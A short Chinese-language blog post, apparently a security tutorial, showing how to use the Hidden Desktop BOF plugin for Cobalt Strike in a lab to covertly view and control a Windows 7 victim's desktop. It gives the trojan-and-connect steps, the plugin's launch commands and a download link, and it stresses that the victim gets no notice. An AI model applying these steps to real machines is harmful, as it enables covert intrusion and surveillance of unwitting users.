免责声明：该站所分享的安全知识仅供安全研究和学习之用，如用于其他用途，产生一切后果由使用者承担全部法律及连带责任，与工具作者和本站无关！

在渗透实战环境中，想真正的远程登录window服务器，往往会碰一鼻子灰，要么3389端口没开，要么提权漏洞全部打上厚厚的补丁，而我们又有登录桌面终端的需求怎么办呢？ 这时候就需要 Hidden Desktop BOF 操作了。

Hidden Desktop BOF 是基于CS设计的一款插件，允许操作员在用户不知情的情况下与远程桌面会话进行交互，而且也不用我们等到深夜运维人员休息之后操作，完全没有任何提示信息，相比使用3389非常NICE！

本地实操：Linux : CS 服务端（192.168.1.220）Win11 : CS 客户端（192.168.1.212）Win 7 : 实验受害者（192.168.1.128）

CS客户端首先连接服务端，并且加载好插件，随后生成 exe 木马文件，win7 正常上线，使用CS上线操作步骤不再演示。

双击程序 HVNC Server.exe 打开Hidden Desktop 客户端，CS终端输入命令：HiddenDesktop 192.168.1.212 1337 连接客户端，出现UI 窗口则成功连接。

使用命令：hd-launch-explorer 即可连接受害者桌面，可点击左上角调节画面质量，且没有任何提示信息。

其他命令：hd-launch-edge hd-launch-explorer hd-launch-run hd-launch-cmd hd-launch-chrome

下载：https://github.com/WKL-Sec/HiddenDesktop/releases/download/v0.1/HiddenDesktop.zip